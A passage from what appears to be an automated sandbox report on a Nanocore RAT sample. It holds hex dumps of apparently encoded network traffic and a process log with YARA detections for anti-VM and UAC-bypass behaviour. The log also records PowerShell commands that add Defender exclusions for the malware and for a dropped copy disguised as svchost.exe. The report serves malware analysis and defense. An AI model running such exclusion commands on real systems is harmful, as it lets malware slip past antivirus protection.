                                                                                              Data Ascii: 83 0 122 0 118 0 70 0 118 0 116 0 82 0 113 0 83 0 119 0 102 0 116 0 83 0 87 0 49 0 105 0 112 0 57 0 100 0 67 0 56 0 73 0 98 0 73 0 72 0 83 0 78 0 90 0 103 0 56 0 50 0 121 0 54 0 114 0 50 0 78 0 103 0 48 0 80 0 102 0 111 0 57 0 76 0 83 0 110 0 82 0 68 0 90
                                                                                              2021-09-27 18:28:01 UTC4976INData Raw: 20 30 20 31 30 33 20 30 20 38 34 20 30 20 36 39 20 30 20 31 30 37 20 30 20 31 30 30 20 30 20 31 32 31 20 30 20 39 30 20 30 20 38 37 20 30 20 37 30 20 30 20 34 38 20 30 20 39 30 20 30 20 38 38 20 30 20 37 33 20 30 20 31 30 33 20 30 20 38 34 20 30 20 38 37 20 30 20 37 30 20 30 20 31 31 37 20 30 20 38 39 20 30 20 35 30 20 30 20 31 30 34 20 30 20 31 30 38 20 30 20 39 39 20 30 20 35 31 20 30 20 38 32 20 30 20 31 30 38 20 30 20 39 39 20 30 20 31 30 36 20 30 20 36 39 20 30 20 38 31 20 30 20 37 37 20 30 20 36 35 20 30 20 35 32 20 30 20 37 31 20 30 20 36 35 20 30 20 34 39 20 30 20 38 35 20 30 20 36 39 20 30 20 36 36 20 30 20 31 32 30 20 30 20 37 37 20 30 20 37 32 20 30 20 38 35 20 30 20 35 30 20 30 20 37 30 20 30 20 31 31 35 20 30 20 39 30 20 30 20 31 30 39 20 30
                                                                                              Data Ascii: 0 103 0 84 0 69 0 107 0 100 0 121 0 90 0 87 0 70 0 48 0 90 0 88 0 73 0 103 0 84 0 87 0 70 0 117 0 89 0 50 0 104 0 108 0 99 0 51 0 82 0 108 0 99 0 106 0 69 0 81 0 77 0 65 0 52 0 71 0 65 0 49 0 85 0 69 0 66 0 120 0 77 0 72 0 85 0 50 0 70 0 115 0 90 0 109 0
                                                                                              2021-09-27 18:28:01 UTC4992INData Raw: 30 20 39 37 20 30 20 33 37 20 30 20 31 31 35 20 30 20 33 37 20 30 20 31 30 38 20 30 20 31 30 31 20 30 20 31 32 32 20 30 20 31 30 39 20 30 20 31 31 37 20 30 20 31 30 33 20 30 20 33 37 20 30 20 31 30 31 20 30 20 33 37 20 30 20 31 31 39 20 30 20 39 37 20 30 20 39 38 20 30 20 39 37 20 30 20 31 32 31 20 30 20 31 31 38 20 30 20 31 31 32 20 30 20 31 32 30 20 30 20 31 32 30 20 30 20 31 30 36 20 30 20 39 38 20 30 20 31 30 31 20 30 20 31 30 34 20 30 20 33 37 20 30 20 31 31 34 20 30 20 33 37 20 30 20 39 37 20 30 20 31 30 32 20 30 20 31 31 37 20 30 20 31 30 37 20 30 20 31 31 39 20 30 20 31 30 30 20 30 20 33 37 20 30 20 31 31 38 20 30 20 33 37 20 30 20 31 31 38 20 30 20 31 30 34 20 30 20 31 31 30 20 30 20 31 30 34 20 30 20 31 30 39 20 30 20 31 30 35 20 30 20 31 31 31
                                                                                              Data Ascii: 0 97 0 37 0 115 0 37 0 108 0 101 0 122 0 109 0 117 0 103 0 37 0 101 0 37 0 119 0 97 0 98 0 97 0 121 0 118 0 112 0 120 0 120 0 106 0 98 0 101 0 104 0 37 0 114 0 37 0 97 0 102 0 117 0 107 0 119 0 100 0 37 0 118 0 37 0 118 0 104 0 110 0 104 0 109 0 105 0 111
                                                                                              2021-09-27 18:28:01 UTC5008INData Raw: 20 31 31 32 20 30 20 31 30 39 20 30 20 31 31 38 20 30 20 33 37 20 30 20 33 32 20 30 20 33 37 20 30 20 31 31 32 20 30 20 31 31 33 20 30 20 31 31 39 20 30 20 39 38 20 30 20 31 30 30 20 30 20 31 31 31 20 30 20 33 37 20 30 20 31 31 35 20 30 20 33 37 20 30 20 31 30 30 20 30 20 31 30 35 20 30 20 31 30 38 20 30 20 31 31 33 20 30 20 31 30 31 20 30 20 39 37 20 30 20 31 30 30 20 30 20 31 30 34 20 30 20 33 37 20 30 20 31 31 36 20 30 20 33 37 20 30 20 39 37 20 30 20 31 31 33 20 30 20 31 30 33 20 30 20 31 30 35 20 30 20 31 32 32 20 30 20 31 30 31 20 30 20 31 30 37 20 30 20 31 31 38 20 30 20 31 31 36 20 30 20 31 30 35 20 30 20 31 31 39 20 30 20 31 32 30 20 30 20 31 30 39 20 30 20 33 37 20 30 20 39 37 20 30 20 33 37 20 30 20 31 31 34 20 30 20 31 31 31 20 30 20 31 31 39
                                                                                              Data Ascii: 112 0 109 0 118 0 37 0 32 0 37 0 112 0 113 0 119 0 98 0 100 0 111 0 37 0 115 0 37 0 100 0 105 0 108 0 113 0 101 0 97 0 100 0 104 0 37 0 116 0 37 0 97 0 113 0 103 0 105 0 122 0 101 0 107 0 118 0 116 0 105 0 119 0 120 0 109 0 37 0 97 0 37 0 114 0 111 0 119
                                                                                              2021-09-27 18:28:01 UTC5024INData Raw: 30 20 31 30 38 20 30 20 31 31 34 20 30 20 31 31 36 20 30 20 31 30 38 20 30 20 31 30 33 20 30 20 31 30 32 20 30 20 31 31 30 20 30 20 31 30 39 20 30 20 31 31 31 20 30 20 31 30 34 20 30 20 31 30 37 20 30 20 31 31 35 20 30 20 31 31 30 20 30 20 33 37 20 30 20 31 30 30 20 30 20 33 37 20 30 20 31 30 30 20 30 20 31 30 32 20 30 20 31 30 30 20 30 20 31 31 32 20 30 20 31 30 37 20 30 20 31 31 31 20 30 20 31 32 30 20 30 20 31 30 35 20 30 20 31 31 32 20 30 20 31 30 31 20 30 20 33 37 20 30 20 31 33 20 30 20 31 30 20 30 20 33 37 20 30 20 31 31 39 20 30 20 31 31 30 20 30 20 39 37 20 30 20 31 30 36 20 30 20 31 30 32 20 30 20 31 31 38 20 30 20 31 30 36 20 30 20 31 31 34 20 30 20 31 31 31 20 30 20 39 38 20 30 20 31 32 32 20 30 20 31 30 34 20 30 20 33 37 20 30 20 39 39 20 30
                                                                                              Data Ascii: 0 108 0 114 0 116 0 108 0 103 0 102 0 110 0 109 0 111 0 104 0 107 0 115 0 110 0 37 0 100 0 37 0 100 0 102 0 100 0 112 0 107 0 111 0 120 0 105 0 112 0 101 0 37 0 13 0 10 0 37 0 119 0 110 0 97 0 106 0 102 0 118 0 106 0 114 0 111 0 98 0 122 0 104 0 37 0 99 0
                                                                                              2021-09-27 18:28:01 UTC5040INData Raw: 20 30 20 31 31 30 20 30 20 31 31 35 20 30 20 30 20 31 20 30 20 33 33 20 31 31 30 20 30 20 31 31 31 20 30 20 38 36 20 30 20 39 37 20 30 20 31 30 38 20 30 20 31 31 37 20 30 20 31 30 31 20 30 20 36 36 20 30 20 31 31 37 20 30 20 31 31 36 20 30 20 38 39 20 30 20 31 30 31 20 30 20 31 31 35 20 30 20 37 35 20 30 20 31 30 31 20 30 20 31 32 31 20 30 20 30 20 38 33 20 36 37 20 30 20 35 38 20 30 20 39 32 20 30 20 38 37 20 30 20 37 33 20 30 20 37 38 20 30 20 36 38 20 30 20 37 39 20 30 20 38 37 20 30 20 38 33 20 30 20 39 32 20 30 20 31 31 35 20 30 20 31 32 31 20 30 20 31 31 35 20 30 20 31 31 36 20 30 20 31 30 31 20 30 20 31 30 39 20 30 20 35 31 20 30 20 35 30 20 30 20 39 32 20 30 20 31 30 30 20 30 20 31 31 34 20 30 20 31 30 35 20 30 20 31 31 38 20 30 20 31 30 31 20 30
                                                                                              Data Ascii: 0 110 0 115 0 0 1 0 33 110 0 111 0 86 0 97 0 108 0 117 0 101 0 66 0 117 0 116 0 89 0 101 0 115 0 75 0 101 0 121 0 0 83 67 0 58 0 92 0 87 0 73 0 78 0 68 0 79 0 87 0 83 0 92 0 115 0 121 0 115 0 116 0 101 0 109 0 51 0 50 0 92 0 100 0 114 0 105 0 118 0 101 0
                                                                                              2021-09-27 18:28:01 UTC5056INData Raw: 32 20 34 20 32 34 34 20 30 20 30 20 31 39 32 20 34 20 32 34 35 20 30 20 30 20 31 39 32 20 34 20 32 34 36 20 30 20 30 20 31 39 32 20 34 20 32 34 37 20 30 20 30 20 31 39 32 20 34 20 32 34 38 20 30 20 30 20 31 39 32 20 34 20 32 34 39 20 30 20 30 20 31 39 32 20 34 20 32 35 30 20 30 20 30 20 31 39 32 20 34 20 33 30 20 31 20 30 20 31 39 32 20 34 20 33 31 20 31 20 30 20 31 39 32 20 34 20 33 32 20 31 20 30 20 31 39 32 20 34 20 33 33 20 31 20 30 20 31 39 32 20 34 20 33 34 20 31 20 30 20 31 39 32 20 34 20 33 35 20 31 20 30 20 31 39 32 20 34 20 33 36 20 31 20 30 20 31 39 32 20 34 20 33 37 20 31 20 30 20 31 39 32 20 34 20 33 38 20 31 20 30 20 31 39 32 20 34 20 33 39 20 31 20 30 20 31 39 32 20 34 20 34 30 20 31 20 30 20 31 39 32 20 34 20 34 31 20 31 20 30 20 31 39 32
                                                                                              Data Ascii: 2 4 244 0 0 192 4 245 0 0 192 4 246 0 0 192 4 247 0 0 192 4 248 0 0 192 4 249 0 0 192 4 250 0 0 192 4 30 1 0 192 4 31 1 0 192 4 32 1 0 192 4 33 1 0 192 4 34 1 0 192 4 35 1 0 192 4 36 1 0 192 4 37 1 0 192 4 38 1 0 192 4 39 1 0 192 4 40 1 0 192 4 41 1 0 192


                                                                                              Code Manipulations

                                                                                              Statistics

                                                                                              Behavior

                                                                                              Click to jump to process

                                                                                              System Behavior

                                                                                              General

                                                                                              Start time:20:27:25
                                                                                              Start date:27/09/2021
                                                                                              Path:C:\Users\user\Desktop\s9SWgUgyO5.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:'C:\Users\user\Desktop\s9SWgUgyO5.exe'
                                                                                              Imagebase:0xc30000
                                                                                              File size:31232 bytes
                                                                                              MD5 hash:B462382CB954466386F9334247E0A34C
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000000.322095738.0000000006140000.00000004.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000000.322095738.0000000006140000.00000004.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000000.287469319.0000000003EC9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000000.287469319.0000000003EC9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000000.288117439.00000000040A9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000000.288117439.00000000040A9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000000.288438993.0000000004189000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000000.288438993.0000000004189000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: NanoCore, Description: unknown, Source: 00000000.00000000.288438993.0000000004189000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              Reputation:low

                                                                                              General

                                                                                              Start time:20:27:28
                                                                                              Start date:27/09/2021
                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
                                                                                              Imagebase:0x11b0000
                                                                                              File size:430592 bytes
                                                                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:20:27:28
                                                                                              Start date:27/09/2021
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7ecfc0000
                                                                                              File size:625664 bytes
                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:20:27:28
                                                                                              Start date:27/09/2021
                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s9SWgUgyO5.exe' -Force
                                                                                              Imagebase:0x11b0000
                                                                                              File size:430592 bytes
                                                                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:20:27:29
                                                                                              Start date:27/09/2021
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7ecfc0000
                                                                                              File size:625664 bytes
                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:20:27:29
                                                                                              Start date:27/09/2021
                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
                                                                                              Imagebase:0x11b0000
                                                                                              File size:430592 bytes
                                                                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:20:27:30
                                                                                              Start date:27/09/2021
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff797770000
                                                                                              File size:625664 bytes
                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:20:27:32
                                                                                              Start date:27/09/2021
                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                              Imagebase:0x7ff797770000
                                                                                              File size:51288 bytes
                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language

                                                                                              General

                                                                                              Start time:20:27:35
                                                                                              Start date:27/09/2021
                                                                                              Path:C:\Users\user\Desktop\s9SWgUgyO5.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Users\user\Desktop\s9SWgUgyO5.exe
                                                                                              Imagebase:0x9e0000
                                                                                              File size:31232 bytes
                                                                                              MD5 hash:B462382CB954466386F9334247E0A34C
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET
                                                                                              Yara matches:
                                                                                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.526244100.0000000007150000.00000004.00020000.sdmp, Author: Florian Roth
                                                                                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.526244100.0000000007150000.00000004.00020000.sdmp, Author: Florian Roth
                                                                                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.526184455.0000000006FF0000.00000004.00020000.sdmp, Author: Florian Roth
                                                                                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.526184455.0000000006FF0000.00000004.00020000.sdmp, Author: Florian Roth
                                                                                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.525611849.0000000006000000.00000004.00020000.sdmp, Author: Florian Roth
                                                                                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.525611849.0000000006000000.00000004.00020000.sdmp, Author: Florian Roth
                                                                                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.526053509.0000000006E20000.00000004.00020000.sdmp, Author: Florian Roth
                                                                                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.526053509.0000000006E20000.00000004.00020000.sdmp, Author: Florian Roth
                                                                                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.526069628.0000000006E30000.00000004.00020000.sdmp, Author: Florian Roth
                                                                                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.526069628.0000000006E30000.00000004.00020000.sdmp, Author: Florian Roth
                                                                                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.526170898.0000000006FE0000.00000004.00020000.sdmp, Author: Florian Roth
                                                                                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.526170898.0000000006FE0000.00000004.00020000.sdmp, Author: Florian Roth
                                                                                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.526125965.0000000006FB0000.00000004.00020000.sdmp, Author: Florian Roth
                                                                                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.526125965.0000000006FB0000.00000004.00020000.sdmp, Author: Florian Roth
                                                                                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.509785046.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000002.509785046.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: NanoCore, Description: unknown, Source: 0000000A.00000002.509785046.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              • Rule: NanoCore, Description: unknown, Source: 0000000A.00000002.522721839.00000000047BF000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000002.515373653.0000000002C91000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: NanoCore, Description: unknown, Source: 0000000A.00000002.515818035.0000000002CFC000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.526153225.0000000006FD0000.00000004.00020000.sdmp, Author: Florian Roth
                                                                                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.526153225.0000000006FD0000.00000004.00020000.sdmp, Author: Florian Roth
                                                                                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.526203306.0000000007000000.00000004.00020000.sdmp, Author: Florian Roth
                                                                                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.526203306.0000000007000000.00000004.00020000.sdmp, Author: Florian Roth
                                                                                              • Rule: NanoCore, Description: unknown, Source: 0000000A.00000003.486623821.00000000048CB000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.526365497.00000000071E0000.00000004.00020000.sdmp, Author: Florian Roth
                                                                                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.526365497.00000000071E0000.00000004.00020000.sdmp, Author: Florian Roth
                                                                                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.526138671.0000000006FC0000.00000004.00020000.sdmp, Author: Florian Roth
                                                                                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.526138671.0000000006FC0000.00000004.00020000.sdmp, Author: Florian Roth
                                                                                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.526340220.00000000071B0000.00000004.00020000.sdmp, Author: Florian Roth
                                                                                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.526340220.00000000071B0000.00000004.00020000.sdmp, Author: Florian Roth
                                                                                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.526292009.0000000007180000.00000004.00020000.sdmp, Author: Florian Roth
                                                                                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.526292009.0000000007180000.00000004.00020000.sdmp, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000002.522820033.00000000048AA000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: NanoCore, Description: unknown, Source: 0000000A.00000002.522820033.00000000048AA000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000002.522346624.0000000003CE7000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.525659501.00000000060A0000.00000004.00020000.sdmp, Author: Florian Roth
                                                                                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.525659501.00000000060A0000.00000004.00020000.sdmp, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000002.525659501.00000000060A0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: NanoCore, Description: unknown, Source: 0000000A.00000002.522470362.0000000004578000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

                                                                                              General

                                                                                              Start time:20:27:36
                                                                                              Start date:27/09/2021
                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                              Imagebase:0x7ff797770000
                                                                                              File size:51288 bytes
                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language

                                                                                              General

                                                                                              Start time:20:27:37
                                                                                              Start date:27/09/2021
                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6376 -ip 6376
                                                                                              Imagebase:0x960000
                                                                                              File size:434592 bytes
                                                                                              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language

                                                                                              General

                                                                                              Start time:20:27:42
                                                                                              Start date:27/09/2021
                                                                                              Path:C:\Users\Public\Documents\???????????????\svchost.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:'C:\Users\Public\Documents\???????????????\svchost.exe'
                                                                                              Imagebase:0x2b0000
                                                                                              File size:31232 bytes
                                                                                              MD5 hash:B462382CB954466386F9334247E0A34C
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000E.00000000.364082141.0000000006100000.00000004.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000000.364082141.0000000006100000.00000004.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000E.00000000.383552870.0000000006100000.00000004.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000000.383552870.0000000006100000.00000004.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000E.00000000.382145337.0000000004814000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000000.382145337.0000000004814000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000E.00000000.359524967.0000000004814000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000000.359524967.0000000004814000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000E.00000000.360439526.0000000004914000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000E.00000000.360439526.0000000004914000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000000.360439526.0000000004914000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000000.360439526.0000000004914000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: NanoCore, Description: unknown, Source: 0000000E.00000000.360439526.0000000004914000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000E.00000000.382552554.0000000004914000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000E.00000000.382552554.0000000004914000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000000.382552554.0000000004914000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000000.382552554.0000000004914000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: NanoCore, Description: unknown, Source: 0000000E.00000000.382552554.0000000004914000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              Antivirus matches:
                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                              • Detection: 26%, Metadefender, Browse
                                                                                              • Detection: 36%, ReversingLabs

                                                                                              General

                                                                                              Start time:20:27:42
                                                                                              Start date:27/09/2021
                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                              Imagebase:0x7ff797770000
                                                                                              File size:51288 bytes
                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language

                                                                                              General

                                                                                              Start time:20:27:44
                                                                                              Start date:27/09/2021
                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                              Imagebase:0x7ff797770000
                                                                                              File size:51288 bytes
                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language

                                                                                              General

                                                                                              Start time:20:27:46
                                                                                              Start date:27/09/2021
                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                              Wow64 process (32bit):false
